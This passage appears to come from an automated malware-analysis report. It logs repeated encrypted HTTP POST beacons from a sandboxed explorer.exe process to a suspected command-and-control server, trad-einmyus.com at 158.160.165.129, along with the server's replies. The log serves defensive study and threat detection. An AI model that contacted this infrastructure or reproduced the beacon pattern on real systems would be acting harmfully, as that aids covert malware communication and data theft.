                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.449767158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:49.866228104 CEST284OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://uetjtbokcendpi.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 348
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:49.866278887 CEST348OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 03 c0 b6 6a
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dj"qz;vtrW>mvOB65/:2yF 5es;,,19V%;%aR>P)-d(,}7>5#JJS4ZdAOtG_x/(%guZ
                                                                                              May 25, 2024 21:29:50.749275923 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:50 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.449769158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:50.854255915 CEST286OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://obuibmhfpgvomgod.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 234
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:50.854255915 CEST234OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 19 93 cf 30
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d0_|5N5S?jwK/yw96!Ds!&}#(|De2 F{S^^pt%R{3>{]#G^=3%~}gFoI.bbj1
                                                                                              May 25, 2024 21:29:51.689519882 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:51 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.449770158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:51.704930067 CEST284OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ukrvqlmerplrex.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 350
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:51.704977989 CEST350OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 26 d2 8b 1d
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d&67aP^b*o)MrZD73FEV>{k})V*UVJc[[4|&K0F*y@\zQG[zw+0f1}< liA
                                                                                              May 25, 2024 21:29:52.445130110 CEST233INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:52 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 32I:82OCxobz5-?FP0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.449774158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:54.574933052 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://tldcvhhvnmxh.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 125
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:54.574954033 CEST125OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 15 af d4 68
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dh@Dp6A/4E`#ekU=)/
                                                                                              May 25, 2024 21:29:55.299410105 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:55 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.449775158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:55.404520035 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ncehelngswfsf.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 310
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:55.404572964 CEST310OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 16 80 d0 7a
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dzh[Lb"c }k+Rjof1~C`eK%p0a.W{!1CNMYvW=9bPC1ef&mZBF(T(:ib'@V
                                                                                              May 25, 2024 21:29:56.295273066 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:56 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.449777158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:56.417455912 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://amrbjqbtgpnr.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 193
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:56.417522907 CEST193OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 31 d8 dd 75
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d1uH|(o@QiS)5Xecq'}b8IU1#>C{i-JIG)17ZG+]@1#xM#vFV
                                                                                              May 25, 2024 21:29:57.175282955 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:57 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.449778158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:57.239689112 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://lejcpsbnxtuxdtx.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 227
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:57.239712954 CEST227OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 5f ad bf 18
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d_4i3Yi>8{YvM`i++9's|%SH&OK>0nR!wS~Er.J#&vX,}?RiQE})YG }yq<
                                                                                              May 25, 2024 21:29:57.990695000 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:57 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.449780158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:58.049560070 CEST284OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://trlgbchacigdlq.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 233
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:58.049580097 CEST233OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 23 c4 da 7e
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d#~1a0iS:XGO1I^oh3>2h%_U9+NJgB!vOLj]|avz!z?K=AiH7 J(LEi*+NZyRwxFr^ z
                                                                                              May 25, 2024 21:29:59.018557072 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:58 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.449782158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:59.082948923 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://irythjvgtsstcpv.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 250
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:59.083168030 CEST250OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 2f a7 c7 33
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d/38`7=L]`-:^Xk~I_.+o 0a2AmOfR'Q?3K$giM1P16"#z.#@)'RLUh"trj.$!mRr=
                                                                                              May 25, 2024 21:30:00.538767099 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:59 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                              May 25, 2024 21:30:00.543560982 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:59 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.449784158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:00.599942923 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://nwelovrvoirfrsd.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 283
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:00.599944115 CEST283OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 16 b2 b2 76
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dv^O)7@qPH6ymNa6a5 .3K2@xX P<g&6%Cs>3/[i ,LT$\6b#^H|_5v_aG<hu\tA9
                                                                                              May 25, 2024 21:30:01.439007044 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:01 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.449787158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:01.497363091 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://xvkfgvcftmyct.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 324
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:01.497363091 CEST324OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 2a c3 8e 14
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d*[k3kO7X#Lkukl+BSxFCT70#(qXA1Q;'&:jwcv!2W@!Xp/U&?"0gv"SrZ
                                                                                              May 25, 2024 21:30:02.609781027 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:02 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
